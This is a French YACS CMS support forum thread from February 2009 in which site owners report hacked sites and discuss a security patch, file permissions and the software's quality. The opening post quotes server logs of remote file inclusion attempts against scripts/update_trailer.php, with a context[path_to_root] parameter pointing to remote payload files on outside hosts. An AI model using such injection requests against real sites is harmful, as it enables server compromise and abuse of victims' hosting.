Post to Facebook
Tweet about this
Share at LinkedIn
Invite participants
Reference this pagesupport « Soupçons de bogues «
hacking de mes sites? [Solved]
la solution est donnée par Bernard: http://www.yetanothercommunity...rte-de-securite
| Owner | Fréchette Carmen |
| Progress |  |
| Workflow | Support request |
| Status | A solution has been made available
|
bonjour,
Je viens de recevoir deux message d'OVH au sujet de mes sites (j'utilise yacs)
Problème rencontré : Hidden PERL script
Commande apparente : lynx
Exécutable utilisé : /usr/bin/perl
Horodatage: Mon Feb 16 22:04:47 CET 2009
quand je regarde les logs, je vois ceci:
ns1.f1contact.com www.sitenumero1.com - [16/Feb/2009:19:32:46 +0100] "GET /control//scripts/update_trailer.php?context[path_to_root]=http://www.edupa.uva.es/tutoriavirtual/claroline/exercice/idsoev6.txt 
HTTP/1.1" 403 237 "-" "libwww-perl/5.810"
ns1.f1contact.com www.sitenumero1.com - [16/Feb/2009:19:32:46 +0100] "GET scripts/update_trailer.php?context[path_to_root]=http://www.edupa.uva.es/tutoriavirtual/claroline/exercice/idsoev6.txt HTTP/1.1" 403 228 "-" "libwww-perl/5.810"
plutao.lusodigital.net www.sitenumero1.com - [16/Feb/2009:19:35:13 +0100] "GET /controlscripts/update_trailer.php?context[path_to_root]=http://www.edupa.uva.es/tutoriavirtual/claroline/exercice/idsoev6.txt HTTP/1.1" 403 237 "-" "libwww-perl/5.805"
plutao.lusodigital.net www.sitenumero1.com - [16/Feb/2009:19:35:34 +0100] "GET /servers//scripts/update_trailer.php?context[path_to_root]=http://www.edupa.uva.es/tutoriavirtual/claroline/exercice/idsoev6.txt HTTP/1.1" 403 237 "-" "libwww-perl/5.805"
srv003.infobox.ru sitenumero2.info - [16/Feb/2009:21:58:19 +0100] "GET //yacs/scripts/update_trailer.php?context[path_to_root]=http://www.kbmaeil.com/kboard/test.txt?? HTTP/1.1" 404 229 "-" "Avant Browser (http://www.avantbrowser.com)"
J'ai renommé le fichier update_trailer.php
puis j'ai remis le dossier www à 705 et tout semble ok à nouveau...
mais je trouve ça bizarre...
suis je la seul à qui ceci est arrivé?
 Christian |  on Feb. 20 2009 Bravo footix69. j'étais absent aujourd'hui mais c'est une bonne réaction. Attention a bien verifier les droits que donne yacs à l'origine pour ne pas en donner plus qu'il n'en faut. Actupro quelques sites yacs : création site internet annuaire pro |
 footix69 | on Feb. 20 2009 Bon je me suis dépanné tout seul car c'était tout bête. Après l'attaque du site, les permissions ont été changées (par l'hébergeur probablement). Il fallait donc rétablir les permissions. Pour tous les débutants, cf ci-dessous l'extrait du guide OVH. " Les erreurs 403 peuvent avoir pour origine des droits incorrects sur : |
footix69 | on Feb. 19 2009  Rien d'autre à faire que d'emm... les honnêtes webmestres. Bon mon serveur est en berne également (erreur 403). J'ai pas reçu de message de la part de l'hébergeur. Merci pour le correctif.  Je ne comprends pas comment faire repartir le serveur (serveur mutualisé chez OVH). C'est peut-être dans le message que certains ont reçu. Désolé de jouer le boulet, mais si quelqu'un peut m'éviter de tout réinstaller je suis preneur de l'information. Bonne journée 
|
| Ludovic Rio | on Feb. 19 2009
|
 Agnès Rambaud |  on Feb. 18 2009 J'ai donc du mal à accepter que tu puisses dire que Yacs est un cms (je cite) lourd, très mal codé et truffé de bugs... sans autre forme d'arguments. Les failles de sécurité sont une réalité et je trouve que Yacs de se point de vue est plutôt bien protégé. Bien sûr il arrive qu'il y en ait qui mettent en péril nos sites - 5/20 touchés pour moi - mais les réactions sont toujours immédiates, et de ce point de vue il n'y a strictement rien à redire. 3 failles critiques depuis plus de 3 ans que je suis là, toujours traitées et patchées dans les 24h, dont une qui ne m'a même pas effleurée - moins critique peut-être, ou vague moins intensive ? - vraiment, est-ce monstrueux ? Je n'ai pas de statistiques pour d'autres cms, mais honnêtement, je ne trouve pas cela phénoménal au point de qualifier l'outil de "très mal codé". Toi qui est un habitué du libre en général et en particulier des OS libres, ne vient pas me dire que les mises à jour de sécurité sont rares dans ce monde là. Et c'est tant mieux qu'il y ait des gens réactifs et efficaces, ce qu'on a pas avec de grands éditeurs de soft propriétaires - même s'ils commencent à s'y mettre et à mieux corriger leurs outils. C'est qu'on devient exigeant avec le libre ! Tu ne peux pas dire comme ça non plus que Yacs est très mal codé, parce que pour avoir mis le nez dans un paquet d'outils, j'ai rarement trouvé des scripts aussi bien documentés, et ce pour la totalité des scripts, et en permanence. C'est très loin d'être le cas partout. Quant aux bugs, je ne connais pas de système zéro bug, il y en a toujours qui traînent. La grande question de savoir s'il faut stopper le développement pour sortir une version entièrement débuguée - du moins au possible - a déjà été posée et étudiée, en fonction des choix de développement de Yacs. Les choses ont évolué depuis 1 an, et tu pourras noter qu'il n'y a pas eu d'évolution durant 6 mois pour arriver à Yacs Macnana. Est-ce à dire qu'il n'y a plus de bug ? Non, il en reste probablement. Mais le problème ici, c'est d'arriver à tester Yacs dans tous ses cas de figure, et pour cela, notre communauté a encore des efforts à faire. Tu serais alors, comme beaucoup d'autres, bienvenu à venir rendre compte de tes problèmes rencontrés et des éventuelles solutions trouvées. Je sais que cette démarche t'es familière, et je te remercie ici des contributions que tu a déjà faites. Mais n'oublions pas que rien n'est jamais définitivement acquis en informatique puisque les évolutions sont constantes. Et pour arriver à tenir la route alors qu'il reste immanquablement des bugs plus ou moins sérieux dans Yacs, il y a la puissance et la réactivité de cette communauté de programmeurs et d'utilisateurs, bien décidée à garder au plus haut le niveau du logiciel qu'ils construisent et utilisent. Tu peux compter sur cette communauté, la preuve en est aujourd'hui : une faille, découverte et exploitée depuis deux jours seulement - ta référence d'alerte de sécurité date d'hier, 17 février 2009, à 11h, et le patch est disponible le soir même - sachant que les développeurs de Yacs, tout disponibles qu'ils soient, sont également des gens qui travaillent, comme tout le monde, en général dans la journée. Alors râle, oui, pique une colère, peut-être, mais n'en reste pas à ça. Il y a des gens qui ont des problèmes avec Yacs chez un hébergeur bien précis, qu'on a du mal à cerner et donc à aider. Pourrais-tu nous aider ? Ou d'autres membres de Yacs d'ailleurs. Ça me mine de voir ces problèmes non résolus - alors même que c'est limité à CET hébergeur là et personnellement, je n'ai pas les compétences pour les aider à résoudre leur problème. Yacs évolue sans cesse, s'améliore également sans cesse. Je me souviens de l'implémentation ajax qui causait des lenteurs phénoménales : résolu. Les problèmes liés aux discussions interactives qui arrivaient à bloquer le site chez buehost : résolus. Et il y a bien d'autres choses comme ça. Non, tu ne peux vraiment pas dire ça Laurent, avec tout le respect que j'ai pour toi, c'est limite malhonnête de ta part - mettons ça sur le coup de la colère et passons à des choses plus constructives s'il te plaît. Agnès Il n'y a pas de problèmes, que des solutions. Agnès Il n'y a pas de problèmes, que des solutions. |
Christian |  on Feb. 18 2009 Merci JJ pour ta réponse et Bernard pour ta réactivité. C'est vrai que découvrir une faille de sécurité n'est pas agréable. Ce matin j'ai du mettre à jour 40 sites yacs. Sur ces 40 sites je n'ai jamais connu de problèmes majeurs et pour moi la méthode de mise à jour reste fiable. C'est vrai aussi qu'il y a des problèmes d'incompatibilité chez 1and1 et un travail d'investigation est necessaire pour résoudre ces problèmes. C'est vrai aussi que je reçois des mise à jour de microsoft tous les mois pour corriger des failles de sécurité. J'en ai même vu passer une grosse concernant des clés de cryptages sur unix il n'y a pas si longtemps On a jamais empeché quiconque d'effectuer des tests sur les versions mises à disposition. Au contraire plus il y a de testeurs/developpeurs et plus vite les bugs seront résolus. Actupro quelques sites yacs : création site internet annuaire pro |
 DECLERCQ Laurent | on Feb. 18 2009 Je braille si j'en ai envi et si vous m'avez entendu jusqu'à marseille, tant mieux puisqu'au moins, une solution à été apportée ! J'utilise yacs effectivement depuis 2006. Je suis effectivement déçu par le nombre récurrents de problèmes rencontrés qui fort heureusement ne sont pas que des failles de sécurités. Maintenant, tout le monde le sais bien ici, je suis un sale con rigide qui sait pas s'exprimer donc... Moi je le dis haut et fort, avant de propulser de nouvelles versions avec x nouvelles fonctionnalités, serait-il pas plus judicieux de s'assurer que celles qui existent déjà soient fiables. Bon d'accord,  L.declercq / Nuxwin L.declercq / Nuxwin
|
 J.Juraver | on Feb. 18 2009 Arrête de brailler Laurent Declercq. On t'entend jusqu'à marseille. C'est la seconde vulnérabilité avérée de yacs avec des actes concrets de piratage, en une bonne année. Ce n'est pas énorme. Toi qui l'utilise depuis au moins 2006, on se demande pourquoi tu persistes si tu es si mécontent. Quelque part, yacs doit bien te convenir, puisque tu en a fais un bon gros portail. -----  Râââ mais... c'te bête sur l'écran..pffff! Un parasite d'animal poilu encore.Annuaire des sites YACs Plugin Firefox de recherche dans Yetanoz Nouvelles fonctions suggérées Je ne m'attarde pas, j'ai mon yacs en double file... 
 Yacs on my blog | Suivez le blog Yacs | Yacs Showroom | Plugin Firefox de recherche dans Yetanoz | |
 Bernard Paques | on Feb. 17 2009 Alerte de sécurité Mes sites aussi ont été attaqués, et je trouve, moi aussi, ce genre de situation fort désagréable... |
 Gérard | on Feb. 17 2009 Cela faisait longtemps que je n'étais pas revenu vers la communauté Yacs (je m'en excuse d'ailleurs, ayant été occupé par ailleurs) mais là je suis comme vous dans la Grande Panade : Mon hébergeur 1and1 m'informe que mon site est vraisemblablement victime de piratage : Votre espace web 1&1 envoie actuellement un grand nombre d'e-mails à des adresses non-existantes. En ce moment, nous ne saurons déterminer si vous déclenchez cet envoi ou s'il provient de tiers, qui mésuseraient le compte à votre insu. Toutefois, cet envoi représente un danger imminent pour notre infrastructure. L'envoi à des adresses non-existantes est une caractéristique typique du spamming. Comme je n'ai aucune idée de ce qu'il faudrait faire (ce n'est pas moi qui déclenche ces envois) pour que cela cesse ou comment trouver le script défaillant ou encore le ou les fichiers déposés sur mon site par les pirates, je suis bien embêté, d'autant que 1and1 va bientôt bloquer mon site. De plus, depuis que je suis passé aux versions 8.6, 8.11Macnana et maintenant 9.1beta6, j'ai découvert des tas de dysfonctionnement, en vrac :
Bon j'arrête là car je ne voudrais pas donner une mauvaise image de Yacs (vu les commentaires précédents) J'avais choisi Yacs pour son super équilibre entre simplicité et puissance, sa facilité de prise en mains, sa communauté très sympathique et active, et depuis 3 ans maintenant je n'avais pas trop à le regretter. J'en suis très satisfait à ce jour. C'est toujours (encore) le cas à ce jour mais peut-être le mieux est-il l'ennemi du bien. En effet, pourquoi sortir des versions beta qui ne sont pas forcément abouties et par exemple garder comme version de référence la 8.11RC30 Macnana (ou la 8.6beta qui comme son nom semble l'indiquer est une beta ou alors c'est une erreur de communication) sur laquelle j'ai également rencontré des tas de problémes. Les suggestions faites par Carmen dans Des idées pour 2009 me paraissent vachement intéressantes !!! In fine, je garde ma confiance à Yacs mais j'aimerais bien retrouver un site non piraté et non piratable. Je n'ai pas trouvé dans mon site de script /scripts/update_trailer.php qui semble incriminéSi vous avez des idées, merci de votre aide !! |
| Fréchette Carmen | on Feb. 17 2009 hou là !. Pas d'accord! Je ne dirais pas que yacs est truffé de bugs... personnellement, c'est la première fois qu'une telle chose arrive, c'est une faille (je pense car je ne suis vraiment pas expert en php, et je remercie yacs de me fournir toutes ses fonctions) Une faille dis-je, comme il y en a dans tous les logiciels, windows entre autre, mais aussi dans linux... et ce que j'aime de Linux (ubuntu) est que, quand une telle chose arrive, il y a toujours quelqu'un, quelques heures ou jours plus tard, qui trouve la solution et corrige et améliore le tout Pour moi, Yacs, c'est comme Linux, c'est en constante évolution... Et il y aura toujours des gens pour chercher à profiter -abuser- des bonnes intentions par une faille justement... Pour moi, le fait de renommer le fichier a règlé le problème décrit ici... tant qu'à la cause.. et bien je demande aux programmeurs de m'expliquer car je ne sais pas mais je veux bien apprendre
|
| Fréchette Carmen | on Feb. 17 2009 Perso, j'ai découvert que des pages publicitaires s'ouvrent avant que je renomme le fichier qui a été utilisé pour faire je ne sais quel tour de passe-passe... Une fois le fichier renommer et toute les purges du panneau administration faites, tout semble revenir dans l'ordre.. Mais... comment sécurisé ce fichier pour qu'il ne soit plus utilisé pour des publicités non désiré? |
 Le Carbonnier, olivier | on Feb. 17 2009 même chose pour sangliervolant.net Olivier Bonjour,
|
| Ludovic Rio | on Feb. 17 2009 J'ai découvert que le fichier index.php (qui redirige vers Yacs) à la racine de mon site a été écrasé. Cette manip pourrait-elle être due à une éventuelle faille dans Yacs? Merci!
|
Click to slide
